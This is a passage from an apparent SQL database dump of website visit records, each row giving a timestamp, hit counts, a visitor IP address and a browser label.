,1,0,0,'66.249.66.42','chrome'),(322174,1540898229,1,1,0,0,'66.249.69.156','chrome'),(322175,1540898230,1,1,0,0,'66.249.69.144','chrome'),(322176,1540898242,2,2,0,0,'54.188.223.113','firefox'),(322177,1540898417,1,1,0,0,'66.249.75.29','chrome'),(322178,1540898418,6,6,0,0,'66.249.75.13','chrome'),(322179,1540898812,33,33,0,0,'95.216.11.34','other'),(322180,1540898814,33,33,0,0,'95.216.11.233','other'),(322181,1540898849,1,1,0,0,'8.29.198.27','other'),(322182,1540898937,5,5,0,0,'66.249.75.16','chrome'),(322183,1540899050,7,7,0,0,'66.249.75.15','chrome'),(322184,1540899074,1,1,0,0,'46.229.168.153','other'),(322185,1540899075,1,1,0,0,'46.229.168.137','other'),(322186,1540899140,1,1,0,0,'66.249.75.28','chrome'),(322187,1540899243,1,1,0,0,'40.77.167.41','other'),(322188,1540899373,7,7,0,0,'66.249.75.13','chrome'),(322189,1540899478,2,2,0,0,'91.196.178.132','firefox'),(322190,1540899815,1,1,0,0,'40.77.167.42','other'),(322191,1540900006,2,2,0,0,'66.249.75.15','chrome'),(322192,1540900374,2,2,0,0,'8.29.198.27','other'),(322193,1540900570,1,1,0,0,'66.249.75.195','chrome'),(322194,1540900571,1,1,0,0,'66.249.75.220','chrome'),(322195,1540900766,4,4,0,0,'66.249.75.13','chrome'),(322196,1540901044,1,1,0,0,'66.249.75.16','chrome'),(322197,1540901112,6,6,0,0,'66.249.75.15','chrome'),(322198,1540901127,1,1,0,0,'66.249.75.222','chrome'),(322199,1540901179,1,1,0,0,'66.249.75.28','chrome'),(322200,1540901796,2,2,0,0,'40.77.167.43','other'),(322201,1540901857,5,5,0,0,'66.249.75.13','chrome'),(322202,1540902045,1,1,0,0,'66.249.75.195','chrome'),(322204,1540902128,2,2,0,0,'66.249.75.30','chrome'),(322205,1540902180,1,1,0,0,'66.249.75.29','chrome'),(322206,1540902205,98,98,0,0,'144.76.81.72','other'),(322207,1540902489,2,2,0,0,'66.249.75.16','chrome'),(322208,1540902501,1,1,0,0,'46.229.168.144','other'),(322209,1540902503,1,1,0,0,'46.229.168.146','other'),(322210,1540902512,3,3,0,0,'66.249.75.15','chrome'),(322211,1540902595,1,1,0,0,'216.244.66.241','other'),(322212,1540903117,2,2,0,0,'91.196.178.184','firefox'),(322213,1540903174,1,1,0,0,'95.163.255.94','other'),(322214,1540903177,1,1,0,0,'95.163.255.96','other'),(322215,1540903312,3,3,0,0,'194.37.248.11','chrome'),(322216,1540903934,2,2,0,0,'66.249.75.195','chrome'),(322217,1540903935,2,2,0,0,'66.249.75.218','chrome'),(322218,1540904099,1,1,0,0,'66.249.75.199','chrome'),(322219,1540904100,1,1,0,0,'66.249.75.220','chrome'),(322220,1540904514,2,2,0,0,'66.249.75.28','chrome'),(322222,1540904536,2,2,0,0,'66.249.75.13','chrome'),(322223,1540904590,1,1,0,0,'66.249.75.30','chrome'),(322224,1540904591,1,1,0,0,'66.249.75.15','chrome'),(322225,1540904615,1,1,0,0,'62.205.134.182','msie'),(322226,1540904978,88,88,0,0,'158.69.252.176','other'),(322227,1540905124,1,1,0,0,'66.249.75.220','chrome'),(322228,1540905515,1,1,0,0,'185.117.118.152','other'),(322229,1540905516,1,1,0,0,'185.117.118.147','other'),(322230,1540905581,2,2,0,0,'91.196.177.79','chrome'),(322231,1540905832,1,1,0,0,'66.249.75.199','chrome'),(322232,1540905834,4,4,0,0,'66.249.75.218','chrome'),(322233,1540906330,3,3,0,0,'66.249.75.29','chrome'),(322234,1540906334,2,2,0,0,'66.249.75.16','chrome'),(322235,1540906403,2,2,0,0,'66.249.75.222','chrome'),(322236,1540906545,2,2,0,0,'66.249.75.28','chrome'),(322237,1540906546,3,3,0,0,'66.249.75.13','chrome'),(322238,1540906675,2,2,0,0,'91.196.178.129','firefox'),(322239,1540906907,2,2,0,0,'66.249.75.220','chrome'),(322240,1540907096,2,2,0,0,'178.154.244.11','other'),(322241,1540907100,1,1,0,0,'178.154.244.29','other'),(322242,1540907773,2,2,0,0,'66.249.75.199','chrome'),(322243,1540907891,2,2,0,0,'91.196.178.89','chrome'),(322244,1540907939,2,2,0,0,'66.249.75.222','chrome'),(322245,1540908112,2,2,0,0,'216.244.66.241','other'),(322246,1540908219,1,1,0,0,'66.249.75.220','chrome'),(322247,1540908276,3,3,0,0,'66.249.75.28','chrome'),(322248,1540908279,1,1,0,0,'66.249.75.15','chrome'),(322249,1540908311,1,1,0,0,'66.249.75.30','chrome'),(322250,1540908317,3,3,0,0,'66.249.75.13','chrome'),(322251,1540908324,2,2,0,0,'66.249.75.218','chrome'),(322252,1540908367,2,2,0,0,'178.93.46.209','chrome'),(322253,1540908653,1,1,0,0,'66.249.75.29','chrome'),(322254,1540909073,1,1,0,0,'46.229.168.138','other'),(322255,1540909080,2,2,0,0,'91.196.178.89','chrome'),(322256,1540909254,2,2,0,0,'91.209.11.236','other'),(322257,1540909502,4,4,0,0,'91.196.177.15','chrome'),(322258,1540909507,2,2,0,0,'66.249.75.220','chrome'),(322259,1540909616,7,7,0,0,'66.249.75.218','chrome'),(322260,1540909693,1,1,0,0,'46.229.168.148','other'),(322261,1540909695,1,1,0,0,'46.229.168.149','other'),(322262,1540909727,1,1,0,0,'8.29.198.26','other'),(322263,1540909868,4,4,0,0,'66.249.75.222','chrome'),(322264,1540910063,1,1,0,0,'216.244.66.241','other'),(322265,1540910158,1,1,0,0,'66.249.75.30','chrome'),(322266,1540910159,1,1,0,0,'66.249.75.15','chrome'),(322267,1540910219,1,1,0,0,'91.196.178.89','chrome'),(322268,1540910453,3,3,0,0,'193.106.136.58','chrome'),(322269,1540910608,6,6,0,0,'40.77.167.41','other'),(322270,1540910615,7,7,0,0,'40.77.167.43','other'),(322271,1540910622,5,5,0,0,'40.77.167.42','other'),(322272,1540910625,2,2,0,0,'66.249.75.13','chrome'),(322273,1540910630,2,2,0,0,'40.77.167.40','other'),(322274,1540910660,1,1,0,0,'188.230.43.254','other'),(322275,1540910839,4,4,0,0,'91.196.177.15','chrome'),(322276,1540910884,2,2,0,0,'178.251.106.198','firefox'),(322277,1540910921,1,1,0,0,'91.196.178.181','chrome'),(322278,1540910931,1,1,0,0,'31.13.115.12','other'),(322279,1540910964,1,1,0,0,'193.106.144.50','chrome'),(322280,1540910975,1,1,0,0,'178.54.67.126','chrome'),(322281,1540910994,1,1,0,0,'91.196.177.46','chrome'),(322282,1540911063,1,1,0,0,'77.111.244.113','chrome'),(322283,1540911128,1,1,0,0,'91.196.178.89','chrome'),(322284,1540911143,2,2,0,0,'46.133.35.149','chrome'),(322285,1540911158,1,1,0,0,'31.43.17.120','chrome'),(322286,1540911169,1,1,0,0,'188.163.16.223','chrome'),(322287,1540911245,2,2,0,0,'8.29.198.27','other'),(322288,1540911246,1,1,0,0,'31.13.115.15','other'),(322289,1540911258,1,1,0,0,'180.76.15.29','other'),(322291,1540911259,1,1,0,0,'180.76.15.28','other'),(322292,1540911262,2,2,0,0,'212.26.140.58','chrome'),(322293,1540911273,1,1,0,0,'46.201.174.95','chrome'),(322294,1540911305,1,1,0,0,'31.43.8.154','firefox'),(322295,1540911434,3,3,0,0,'91.196.178.133','chrome'),(322296,1540911453,1,1,0,0,'66.249.75.28','chrome'),(322297,1540911528,4,4,0,0,'66.249.75.220','chrome'),(322298,1540911562,1,1,0,0,'95.132.50.166','other'),(322299,1540911775,1,1,0,0,'193.106.136.58','chrome'),(322300,1540911909,1,1,0,0,'37.73.154.129','other'),(322301,1540912031,1,1,0,0,'173.252.95.16','other'),(322302,1540912052,4,4,0,0,'91.196.178.169','chrome'),(322303,1540912055,1,1,0,0,'66.249.75.222','chrome'),(322304,1540912069,1,1,0,0,'91.196.178.89','chrome'),(322305,1540912161,1,1,0,0,'178.133.8.74','other'),(322306,1540912313,1,1,0,0,'37.73.135.237','chrome'),(322307,1540912467,1,1,0,0,'46.211.108.153','chrome'),(322308,1540912488,1,1,0,0,'37.73.116.215','chrome'),(322309,1540912870,3,3,0,0,'66.249.75.220','chrome'),(322310,1540912884,1,1,0,0,'91.196.178.67','chrome'),(322311,1540912960,1,1,0,0,'46.211.44.200','chrome'),(322312,1540913014,6,6,0,0,'66.249.75.13','chrome'),(322313,1540913017,2,2,0,0,'212.26.136.202','chrome'),(322314,1540913045,2,2,0,0,'213.130.15.197','chrome'),(322315,1540913081,1,1,0,0,'188.230.43.254','other'),(322316,1540913170,2,2,0,0,'66.249.75.195','chrome'),(322317,1540913172,2,2,0,0,'66.249.75.222','chrome'),(322318,1540913194,2,2,0,0,'66.249.75.218','chrome'),(322319,1540913258,1,1,0,0,'180.76.15.152','other'),(322320,1540913261,1,1,0,0,'180.76.15.140','other'),(322321,1540913370,2,2,0,0,'195.34.207.25','chrome'),(322322,1540913517,1,1,0,0,'46.211.37.131','chrome'),(322323,1540913725,1,1,0,0,'66.249.75.30','chrome'),(322324,1540913746,1,1,0,0,'46.211.68.56','chrome'),(322325,1540913842,3,3,0,0,'66.249.75.220','chrome'),(322326,1540914125,1,1,0,0,'66.249.75.222','chrome'),(322327,1540914277,1,1,0,0,'91.196.178.100','chrome'),(322328,1540914392,1,1,0,0,'95.132.13.127','other'),(322329,1540915126,2,2,0,0,'66.249.75.220','chrome'),(322330,1540915203,1,1,0,0,'173.252.87.10','other'),(322331,1540915226,1,1,0,0,'66.220.149.32','other'),(322332,1540915374,1,1,0,0,'66.249.75.218','chrome'),(322333,1540915456,1,1,0,0,'188.230.43.254','other'),(322334,1540915487,1,1,0,0,'66.249.75.222','chrome'),(322335,1540915739,1,1,0,0,'37.73.172.227','chrome'),(322336,1540915822,1,1,0,0,'173.252.87.13','other'),(322337,1540915916,1,1,0,0,'37.73.189.168','chrome'),(322338,1540916012,2,2,0,0,'46.211.4.249','chrome'),(322339,1540916491,2,2,0,0,'46.211.119.33','chrome'),(322340,1540916615,1,1,0,0,'46.211.24.128','other'),(322341,1540916859,2,2,0,0,'5.45.207.19','other'),(322342,1540916864,1,1,0,0,'141.8.142.103','other'),(322343,1540916925,3,3,0,0,'130.180.218.6','chrome'),(322344,1540917044,1,1,0,0,'46.219.207.191','other'),(322345,1540917394,1,1,0,0,'46.211.119.33','chrome'),(322346,1540917406,1,1,0,0,'66.249.75.220','chrome'),(322347,1540917464,1,1,0,0,'95.108.213.4','other'),(322348,1540917635,1,1,0,0,'176.122.101.178','chrome'),(322349,1540917636,1,1,0,0,'95.163.255.107','other'),(322350,1540917648,1,1,0,0,'95.163.255.103','other'),(322351,1540917728,1,1,0,0,'5.45.207.79','other'),(322352,1540917732,2,2,0,0,'178.154.244.11','other'),(322353,1540917837,1,1,0,0,'66.249.75.13','chrome'),(322354,1540917945,1,1,0,0,'5.45.207.19','other'),(322355,1540918252,1,1,0,0,'213.180.203.9','other'),(322356,1540918258,1,1,0,0,'37.9.113.20','other'),(322357,1540918317,1,1,0,0,'46.211.119.33','chrome'),(322358,1540918415,7,7,0,0,'178.154.244.29','other'),(322359,1540918520,1,1,0,0,'66.249.69.142','chrome'),(322360,1540918788,3,3,0,0,'178.154.244.11','other'),(322361,1540919000,1,1,0,0,'198.245.124.39','other'),(322362,1540919326,1,1,0,0,'188.163.114.115','other'),(322363,1540919383,2,2,0,0,'91.196.178.91','firefox'),(322364,1540919532,5,5,0,0,'178.154.244.29','other'),(322365,1540919738,1,1,0,0,'95.132.8.13','chrome'),(322366,1540919750,3,3,0,0,'178.154.244.11','other'),(322367,1540920084,2,2,0,0,'5.45.207.79','other'),(322368,1540920252,1,1,0,0,'91.196.178.70','chrome'),(322369,1540920345,2,2,0,0,'46.211.119.33','chrome'),(322370,1540920594,1,1,0,0,'8.29.198.25','other'),(322371,1540920655,3,3,0,0,'216.244.66.241','other'),(322372,1540920823,1,1,0,0,'46.229.168.149','other'),(322373,1540920827,1,1,0,0,'46.229.168.143','other'),(322374,1540920953,2,2,0,0,'91.196.178.41','chrome'),(322375,1540921533,2,2,0,0,'37.214.2.11','chrome'),(322376,1540921906,1,0,1,0,'66.249.75.195',''),(322377,1540921908,1,0,1,0,'66.249.75.218',''),(322378,1540921947,1,1,0,0,'91.225.172.228','chrome'),(322379,1540922107,1,1,0,0,'8.29.198.25','other'),(322380,1540922135,1,1,0,0,'46.211.131.162','chrome'),(322381,1540922161,1,1,0,0,'46.211.111.194','other'),(322382,1540922599,1,1,0,0,'66.249.75.13','chrome'),(322383,1540922600,1,1,0,0,'8.29.198.27','other'),(322384,1540923116,2,2,0,0,'95.134.184.117','chrome'),(322385,1540923131,1,1,0,0,'173.252.87.2','other'),(322386,1540924088,2,2,0,0,'46.211.69.197','chrome'),(322387,1540924412,1,1,0,0,'66.249.75.16','chrome'),(322388,1540924745,116,116,0,0,'192.151.145.82','other'),(322389,1540925212,1,1,0,0,'46.229.168.147','other'),(322390,1540925215,1,1,0,0,'46.229.168.144','other'),(322391,1540925503,1,1,0,0,'66.249.75.13','chrome'),(322392,1540925553,1,1,0,0,'77.123.93.137','other'),(322393,1540925571,1,1,0,0,'66.249.75.16','chrome'),(322394,1540926392,1,1,0,0,'207.46.13.126','other'),(322395,1540927355,1,1,0,0,'66.249.75.16','chrome'),(322396,1540927377,1,1,0,0,'66.249.75.13','chrome'),(322397,1540927614,2,2,0,0,'46.229.168.137','other'),(322398,1540927618,1,1,0,0,'46.229.168.145','other'),(322399,1540927745,2,2,0,0,'178.154.244.29','other'),(322400,1540927814,2,2,0,0,'178.154.244.11','other'),(322401,1540928173,1,1,0,0,'46.229.168.143','other'),(322402,1540928224,1,1,0,0,'40.77.167.41','other'),(322403,1540928281,2,2,0,0,'216.244.66.241','other'),(322404,1540928670,1,1,0,0,'5.45.207.79','other'),(322405,1540928808,2,2,0,0,'66.249.75.222','chrome'),(322406,1540929156,2,2,0,0,'178.154.244.29','other'),(322407,1540929190,1,1,0,0,'40.77.167.159','other'),(322408,1540929237,1,1,0,0,'66.249.75.15','chrome'),(322409,1540929462,1,1,0,0,'178.154.244.11','other'),(322410,1540929812,1,1,0,0,'91.196.178.131','other'),(322411,1540930275,2,2,0,0,'91.196.178.190','chrome'),(322412,1540930953,1,1,0,0,'178.154.244.29','other'),(322413,1540930978,1,1,0,0,'66.102.9.136','chrome'),(322415,1540931203,1,1,0,0,'176.40.252.33','other'),(322416,1540931284,2,2,0,0,'178.154.244.11','other'),(322417,1540931393,1,1,0,0,'46.229.168.152','other'),(322418,1540931395,1,1,0,0,'46.229.168.137','other'),(322419,1540931452,1,1,0,0,'8.29.198.27','other'),(322420,1540932077,1,1,0,0,'178.154.244.29','other'),(322421,1540932557,1,1,0,0,'109.251.152.181','other'),(322422,1540932608,1,1,0,0,'66.249.75.13','chrome'),(322423,1540932634,1,1,0,0,'46.229.168.139','other'),(322424,1540932635,1,1,0,0,'46.229.168.133','other'),(322425,1540932804,1,1,0,0,'66.249.75.218','chrome'),(322426,1540932967,1,1,0,0,'8.29.198.26','other'),(322427,1540933443,1,1,0,0,'8.29.198.25','other'),(322428,1540933699,1,1,0,0,'207.46.13.126','other'),(322429,1540933737,1,1,0,0,'80.90.55.172','other'),(322430,1540934273,1,1,0,0,'5.45.207.79','other'),(322432,1540934417,1,1,0,0,'46.211.149.15','chrome'),(322433,1540934537,2,2,0,0,'178.154.244.21','other'),(322434,1540934666,1,1,0,0,'66.102.9.131','chrome'),(322436,1540934752,1,1,0,0,'66.249.75.29','chrome'),(322437,1540935119,1,1,0,0,'46.229.168.130','other'),(322438,1540935121,1,1,0,0,'46.229.168.147','other'),(322439,1540935885,1,1,0,0,'180.76.15.159','other'),(322440,1540935886,1,1,0,0,'180.76.15.20','other'),(322441,1540936357,2,2,0,0,'66.249.75.222','chrome'),(322442,1540936680,1,1,0,0,'66.249.75.201','chrome'),(322443,1540936997,1,1,0,0,'46.229.168.141','other'),(322444,1540937000,1,1,0,0,'46.229.168.139','other'),(322445,1540937557,5,5,0,0,'95.163.255.105','other'),(322446,1540937563,3,3,0,0,'95.163.255.117','other'),(322447,1540937576,1,1,0,0,'95.163.255.114','other'),(322448,1540937592,1,1,0,0,'95.163.255.116','other'),(322449,1540937599,2,2,0,0,'95.163.255.104','other'),(322450,1540937605,3,3,0,0,'95.163.255.103','other'),(322451,1540937629,4,4,0,0,'95.163.255.109','other'),(322452,1540937636,1,1,0,0,'95.163.255.102','other'),(322453,1540937649,4,4,0,0,'95.163.255.108','other'),(322454,1540937673,1,1,0,0,'95.163.255.106','other'),(322455,1540938179,2,2,0,0,'91.196.178.98','firefox'),(322456,1540938471,1,1,0,0,'95.163.255.117','other'),(322457,1540938511,2,2,0,0,'40.77.167.159','other'),(322458,1540938613,1,1,0,0,'216.244.66.241','other'),(322459,1540939520,1,1,0,0,'46.229.168.154','other'),(322460,1540939523,2,2,0,0,'46.229.168.140','other'),(322461,1540940109,1,1,0,0,'46.229.168.152','other'),(322462,1540941082,1,1,0,0,'216.244.66.241','other'),(322463,1540941655,1,1,0,0,'66.249.75.218','chrome'),(322464,1540941940,24,24,0,0,'66.249.75.13','chrome'),(322465,1540941948,10,10,0,0,'66.249.75.15','chrome'),(322466,1540942116,11,11,0,0,'66.249.69.140','chrome'),(322467,1540942144,5,5,0,0,'66.249.69.142','chrome'),(322468,1540942305,1,1,0,0,'8.29.198.26','other'),(322469,1540942324,1,1,0,0,'66.249.75.16','chrome'),(322470,1540943070,1,1,0,0,'66.249.75.218','chrome'),(322471,1540943536,1,1,0,0,'66.249.75.222','chrome'),(322472,1540943627,1,1,0,0,'95.163.255.109','other'),(322473,1540943924,1,1,0,0,'8.29.198.25','other'),(322474,1540944131,2,2,0,0,'66.249.69.142','chrome'),(322475,1540944138,6,6,0,0,'66.249.75.15','chrome'),(322476,1540944153,26,26,0,0,'66.249.75.13','chrome'),(322477,1540944288,1,1,0,0,'8.29.198.26','other'),(322478,1540944371,3,3,0,0,'66.249.75.16','chrome'),(322479,1540944500,16,16,0,0,'66.249.69.140','chrome'),(322480,1540944853,1,1,0,0,'66.249.69.144','chrome'),(322481,1540944983,1,1,0,0,'46.229.168.150','other'),(322482,1540944985,1,1,0,0,'46.229.168.148','other'),(322483,1540945001,1,1,0,0,'40.77.167.159','other'),(322484,1540945690,1,1,0,0,'66.249.75.15','chrome'),(322485,1540945720,5,5,0,0,'66.249.69.140','chrome'),(322486,1540945832,2,2,0,0,'66.249.69.144','chrome'),(322487,1540945976,2,2,0,0,'216.244.66.241','other'),(322488,1540946515,1,1,0,0,'95.163.255.95','other'),(322489,1540946519,1,1,0,0,'95.163.255.93','other'),(322490,1540946644,1,1,0,0,'66.249.75.222','chrome'),(322491,1540946894,5,5,0,0,'66.249.75.218','chrome'),(322492,1540947028,1,1,0,0,'66.249.75.220','chrome'),(322493,1540947052,1,1,0,0,'46.229.168.134','other'),(322494,1540947054,1,1,0,0,'46.229.168.152','other'),(322495,1540947141,2,2,0,0,'66.249.75.13','chrome'),(322496,1540947293,1,1,0,0,'66.249.75.201','chrome'),(322497,1540947434,1,1,0,0,'66.249.75.195','chrome'),(322498,1540947593,1,1,0,0,'66.249.75.15','chrome'),(322499,1540948067,1,1,0,0,'66.249.69.140','chrome'),(322500,1540948234,2,2,0,0,'216.244.66.241','other'),(322501,1540948564,2,2,0,0,'66.249.69.144','chrome'),(322502,1540948885,1,1,0,0,'46.229.168.152','other'),(322503,1540948886,2,2,0,0,'46.229.168.134','other'),(322504,1540948890,1,1,0,0,'46.229.168.141','other'),(322505,1540948947,1,1,0,0,'66.249.75.195','chrome'),(322506,1540948948,1,1,0,0,'66.249.75.218','chrome'),(322507,1540949023,1,1,0,0,'40.77.167.159','other'),(322508,1540949215,1,1,0,0,'216.244.66.241','other'),(322509,1540949761,1,1,0,0,'66.249.75.13','chrome'),(322510,1540949806,1,1,0,0,'66.249.69.140','chrome'),(322511,1540950093,1,1,0,0,'46.229.168.142','other'),(322512,1540950097,1,1,0,0,'46.229.168.130','other'),(322513,1540950152,2,2,0,0,'66.249.75.218','chrome'),(322514,1540950881,1,1,0,0,'66.249.75.195','chrome'),(322515,1540950994,1,1,0,0,'66.249.75.222','chrome'),(322516,1540951220,2,2,0,0,'66.249.75.220','chrome'),(322517,1540951733,2,2,0,0,'66.249.75.218','chrome'),(322518,1540952740,1,1,0,0,'66.249.75.199','chrome'),(322519,1540952741,2,2,0,0,'66.249.75.220','chrome'),(322520,1540952785,1,1,0,0,'66.249.75.195','chrome'),(322521,1540952788,3,3,0,0,'66.249.75.218','chrome'),(322522,1540952906,1,1,0,0,'66.249.75.201','chrome'),(322523,1540953004,2,2,0,0,'66.249.75.222','chrome'),(322524,1540953038,3,3,0,0,'216.244.66.241','other'),(322525,1540953165,1,1,0,0,'8.29.198.26','other'),(322526,1540954600,1,1,0,0,'66.249.75.201','chrome'),(322527,1540954601,1,1,0,0,'66.249.75.222','chrome'),(322528,1540954889,2,2,0,0,'8.29.198.26','other'),(322529,1540955319,1,1,0,0,'89.163.131.166','other'),(322530,1540955701,1,1,0,0,'40.77.167.159','other'),(322531,1540955950,1,1,0,0,'40.77.167.41','other'),(322532,1540956073,3,3,0,0,'216.244.66.241','other'),(322533,1540956444,2,2,0,0,'34.215.238.168','chrome'),(322534,1540957552,1,1,0,0,'46.229.168.138','other'),(322535,1540957554,1,1,0,0,'46.229.168.150','other'),(322536,1540957616,2,2,0,0,'66.249.75.15','chrome'),(322537,1540959250,1,1,0,0,'193.106.30.98','firefox'),(322538,1540959445,1,1,0,0,'216.244.66.241','other'),(322539,1540959651,2,2,0,0,'91.209.11.236','other'),(322540,1540960879,1,1,0,0,'95.163.255.94','other'),(322541,1540960882,1,1,0,0,'95.163.255.99','other'),(322542,1540960919,1,1,0,0,'95.132.35.122','chrome'),(322543,1540960967,1,1,0,0,'95.132.35.122','other'),(322544,1540961331,3,3,0,0,'216.244.66.241','other'),(322545,1540962087,1,1,0,0,'46.229.168.149','other'),(322546,1540962091,1,1,0,0,'46.229.168.129','other'),(322547,1540962121,2,2,0,0,'40.77.167.41','other'),(322548,1540962185,2,2,0,0,'66.249.75.16','chrome'),(322549,1540962200,2,2,0,0,'66.249.75.15','chrome'),(322550,1540962222,3,3,0,0,'66.249.75.13','chrome'),(322551,1540963669,1,1,0,0,'40.77.167.159','other'),(322552,1540964027,1,1,0,0,'8.29.198.25','other'),(322553,1540964622,2,2,0,0,'216.244.66.241','other'),(322554,1540965328,1,1,0,0,'91.196.178.136','chrome'),(322555,1540965617,1,1,0,0,'66.249.75.222','chrome'),(322556,1540965774,1,1,0,0,'8.29.198.25','other'),(322557,1540966019,1,1,0,0,'8.29.198.27','other'),(322558,1540966181,2,2,0,0,'66.249.75.220','chrome'),(322559,1540966311,1,1,0,0,'188.163.18.110','other'),(322560,1540966502,2,2,0,0,'216.244.66.241','other'),(322561,1540966761,1,1,0,0,'66.249.69.144','chrome'),(322562,1540966970,4,4,0,0,'40.77.167.41','other'),(322563,1540967038,1,1,0,0,'95.132.11.137','chrome'),(322564,1540967206,2,2,0,0,'91.196.178.84','chrome'),(322565,1540967331,1,1,0,0,'46.164.130.92','firefox'),(322566,1540967395,2,2,0,0,'37.52.251.78','chrome'),(322567,1540967772,5,5,0,0,'178.154.244.29','other'),(322568,1540967787,1,1,0,0,'91.196.178.130','chrome'),(322569,1540967811,1,1,0,0,'141.8.183.23','other'),(322570,1540967923,2,2,0,0,'178.154.244.11','other'),(322571,1540968136,1,1,0,0,'95.135.240.211','chrome'),(322572,1540968209,1,1,0,0,'46.229.168.148','other'),(322573,1540968211,1,1,0,0,'46.229.168.138','other'),(322574,1540968308,1,1,0,0,'95.134.203.43','chrome'),(322575,1540968394,1,1,0,0,'66.249.75.220','chrome'),(322576,1540968583,2,2,0,0,'5.45.207.79','other'),(322577,1540968598,1,1,0,0,'95.163.255.98','other'),(322578,1540968601,1,1,0,0,'95.163.255.95','other'),(322579,1540968890,2,2,0,0,'178.154.244.29','other'),(322580,1540969310,1,1,0,0,'46.229.168.145','other'),(322581,1540969312,1,1,0,0,'46.229.168.132','other'),(322582,1540969394,2,2,0,0,'91.196.178.84','chrome'),(322583,1540969791,4,4,0,0,'178.154.244.29','other'),(322584,1540969805,1,1,0,0,'5.45.207.79','other'),(322585,1540969867,1,1,0,0,'46.164.130.92','firefox'),(322586,1540970363,4,4,0,0,'178.154.244.11','other'),(322587,1540970384,1,1,0,0,'46.229.168.154','other'),(322588,1540970386,1,1,0,0,'46.229.168.152','other'),(322589,1540970756,1,1,0,0,'40.77.167.159','other'),(322590,1540970934,10,10,0,0,'178.154.244.29','other'),(322591,1540970990,1,1,0,0,'66.249.69.142','chrome'),(322592,1540971320,1,1,0,0,'91.196.178.84','chrome'),(322593,1540971337,2,2,0,0,'178.154.244.11','other'),(322594,1540971469,1,1,0,0,'37.73.2.248','chrome'),(322595,1540971665,3,3,0,0,'91.196.178.69','firefox'),(322596,1540971722,2,2,0,0,'91.196.178.67','firefox'),(322597,1540971885,2,2,0,0,'5.45.207.79','other'),(322598,1540971905,1,1,0,0,'91.196.178.186','other'),(322599,1540971961,4,4,0,0,'178.154.244.29','other'),(322600,1540971983,2,2,0,0,'216.244.66.241','other'),(322601,1540972134,1,1,0,0,'95.132.0.165','chrome'),(322602,1540972276,3,3,0,0,'91.196.178.84','chrome'),(322603,1540972377,1,1,0,0,'40.77.167.159','other'),(322604,1540972471,3,3,0,0,'178.154.244.11','other'),(322605,1540972512,1,1,0,0,'91.196.178.84','firefox'),(322606,1540972672,2,2,0,0,'91.196.178.179','chrome'),(322607,1540972881,1,1,0,0,'37.73.128.94','other'),(322608,1540972989,4,4,0,0,'178.154.244.29','other'),(322609,1540972994,1,1,0,0,'5.45.207.79','other'),(322610,1540973412,3,3,0,0,'91.196.178.169','chrome'),(322611,1540973622,1,1,0,0,'46.229.168.150','other'),(322612,1540973623,1,1,0,0,'46.229.168.151','other'),(322613,1540973667,1,1,0,0,'89.19.108.109','chrome'),(322614,1540973691,1,1,0,0,'91.196.178.84','chrome'),(322615,1540973752,1,1,0,0,'66.249.75.218','chrome'),(322616,1540973756,1,1,0,0,'13.57.233.99','chrome'),(322617,1540973959,3,3,0,0,'178.154.244.11','other'),(322618,1540973973,1,1,0,0,'5.45.207.8','other'),(322619,1540974091,1,1,0,0,'66.249.69.140','chrome'),(322620,1540974328,1,1,0,0,'91.196.178.189','chrome'),(322621,1540974332,1,1,0,0,'46.211.106.143','chrome'),(322622,1540974531,4,4,0,0,'91.196.178.70','firefox'),(322623,1540974532,8,8,0,0,'178.154.244.29','other'),(322624,1540974565,1,1,0,0,'66.249.75.222','chrome'),(322625,1540974610,2,2,0,0,'66.249.75.220','chrome'),(322626,1540974630,1,1,0,0,'40.77.167.41','other'),(322627,1540974761,1,1,0,0,'95.132.40.75','chrome'),(322628,1540974783,1,1,0,0,'66.249.75.218','chrome'),(322629,1540974877,1,1,0,0,'8.29.198.27','other'),(322630,1540974960,2,2,0,0,'91.196.178.84','chrome'),(322631,1540975019,2,2,0,0,'178.154.244.11','other'),(322632,1540975021,2,2,0,0,'5.45.207.79','other'),(322633,1540975027,1,1,0,0,'216.244.66.241','other'),(322634,1540975477,10,10,0,0,'178.154.244.29','other'),(322635,1540975696,1,1,0,0,'91.196.177.163','chrome'),(322636,1540975796,6,6,0,0,'195.10.210.70','chrome'),(322637,1540975881,1,1,0,0,'91.196.178.84','chrome'),(322638,1540976017,1,1,0,0,'46.211.135.66','chrome'),(322639,1540976344,2,2,0,0,'207.46.13.94','other'),(322640,1540976458,3,3,0,0,'94.178.6.63','chrome'),(322641,1540976554,2,2,0,0,'178.95.198.110','firefox'),(322642,1540976661,1,1,0,0,'8.29.198.27','other'),(322643,1540976752,4,4,0,0,'178.95.198.110','chrome'),(322644,1540976849,1,1,0,0,'91.196.178.84','chrome'),(322645,1540976905,1,1,0,0,'8.29.198.25','other'),(322646,1540977353,3,3,0,0,'91.196.178.67','chrome'),(322647,1540977391,1,1,0,0,'91.236.126.13','chrome'),(322648,1540977471,2,2,0,0,'178.154.244.29','other'),(322649,1540977508,1,1,0,0,'95.163.255.98','other'),(322650,1540977511,1,1,0,0,'95.163.255.94','other'),(322651,1540977674,3,3,0,0,'66.249.69.140','chrome'),(322652,1540977733,2,2,0,0,'66.249.69.142','chrome'),(322653,1540977827,3,3,0,0,'91.196.178.84','chrome'),(322654,1540977869,1,1,0,0,'66.249.69.144','chrome'),(322655,1540978281,3,3,0,0,'95.216.5.188','other'),(322656,1540978307,3,3,0,0,'91.196.178.67','firefox'),(322657,1540979105,1,1,0,0,'91.196.178.84','chrome'),(322658,1540979344,1,1,0,0,'66.249.75.220','chrome'),(322659,1540979472,1,1,0,0,'66.249.69.157','chrome'),(322661,1540979532,3,3,0,0,'66.249.69.140','chrome'),(322662,1540979582,1,1,0,0,'5.53.113.9','chrome'),(322663,1540979801,2,2,0,0,'178.154.244.11','other'),(322664,1540980012,1,1,0,0,'91.196.178.84','chrome'),(322665,1540980167,1,1,0,0,'216.244.66.241','other'),(322666,1540980174,1,1,0,0,'91.124.82.130','chrome'),(322667,1540980321,1,1,0,0,'31.13.127.7','chrome'),(322668,1540980333,1,1,0,0,'40.77.167.159','other'),(322669,1540980440,1,1,0,0,'37.53.70.79','chrome'),(322670,1540980812,1,1,0,0,'66.249.75.218','chrome'),(322671,1540980996,2,2,0,0,'91.196.178.84','chrome'),(322672,1540981015,1,1,0,0,'212.26.134.106','firefox'),(322673,1540981045,1,1,0,0,'66.249.75.220','chrome'),(322674,1540981374,1,1,0,0,'178.154.244.29','other'),(322675,1540981550,2,2,0,0,'220.243.136.21','chrome'),(322676,1540981551,6,6,0,0,'220.243.136.147','chrome'),(322684,1540981552,2,2,0,0,'220.243.135.234','chrome'),(322686,1540981553,3,3,0,0,'220.243.135.226','chrome'),(322693,